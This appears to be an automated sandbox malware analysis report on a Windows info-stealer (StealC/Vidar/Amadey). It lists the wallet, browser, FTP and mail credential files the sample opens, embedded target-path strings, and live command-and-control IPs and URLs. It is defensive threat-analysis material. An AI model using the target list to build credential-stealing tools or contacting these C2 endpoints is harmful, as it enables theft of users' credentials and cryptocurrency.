Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: passphrase.json
Source: 8ec8c5c339.exe	String found in binary or memory: \jaxx\Local Storage\
Source: 8ec8c5c339.exe	String found in binary or memory: \Ethereum\
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16nes\AppData\Roaming\Binance\simple-storage.json
Source: 8ec8c5c339.exe	String found in binary or memory: Ethereum
Source: 8ec8c5c339.exe	String found in binary or memory: file__0.localstorage
Source: 8ec8c5c339.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: 8ec8c5c339.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: 8ec8c5c339.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: 8ec8c5c339.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: 8ec8c5c339.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B0C40 sqlite3_bind_zeroblob,	8_2_6C3B0C40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B0D60 sqlite3_bind_parameter_name,	8_2_6C3B0D60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2D8EA0 sqlite3_clear_bindings,	8_2_6C2D8EA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	8_2_6C3B0B40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2DC030 sqlite3_bind_parameter_count,	8_2_6C2DC030
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2D6070 PR_Listen,	8_2_6C2D6070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	8_2_6C2DC050

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
34.117.188.166	prod.ads.prod.webservices.mozgcp.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
85.28.47.31	unknown	Russian Federation	31643	GES-ASRU	true
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
142.250.184.238	youtube-ui.l.google.com	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
example.org	93.184.215.14	true
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true
youtube-ui.l.google.com	142.250.184.238	true
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true
ipv4only.arpa	192.0.0.170	true
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true
contile.services.mozilla.com	34.117.188.166	true
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true
spocs.getpocket.com	unknown	unknown
detectportal.firefox.com	unknown	unknown
content-signature-2.cdn.mozilla.net	unknown	unknown
www.youtube.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php	true	2%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.31/8405906461a5200c/nss3.dll	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8NjcvPNvUr.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/Iw	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.phpaY	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpM:S	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Local	Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/cwx	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dlly	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.php-w6	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dll9	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/soka/random.exeN	Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/Qwj	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Avira: detection malicious, Label: HEUR/AGEN.1314148
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314148
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\userKFHCAEGCBF.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7872.7.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Multi AV Scanner detection for domain / URL

Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Virustotal: Detection: 17%	Perma Link
Source: http://85.28.47.31/8405906461a5200c/freebl3.dlly	Virustotal: Detection: 22%	Perma Link
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllF	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: 8NjcvPNvUr.exe

Virustotal: Detection: 52%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\userKFHCAEGCBF.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 8NjcvPNvUr.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0040C660 memset,lstrlenA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,	8_2_0040C660
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	8_2_6C1D6C80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C32A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	8_2_6C32A9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	8_2_6C2F4420
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C324440 PK11_PrivDecrypt,	8_2_6C324440
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3244C0 PK11_PubEncrypt,	8_2_6C3244C0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	8_2_6C3725B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C308670 PK11_ExportEncryptedPrivKeyInfo,	8_2_6C308670
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C32A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	8_2_6C32A650
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C30E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	8_2_6C30E6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C34A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	8_2_6C34A730

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack

Uses 32bit PE files

Source: 8NjcvPNvUr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49564 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49565 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49568 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: nss3.pdb@ source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: mozglue.pdb source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 0MB later: 44MB

Networking

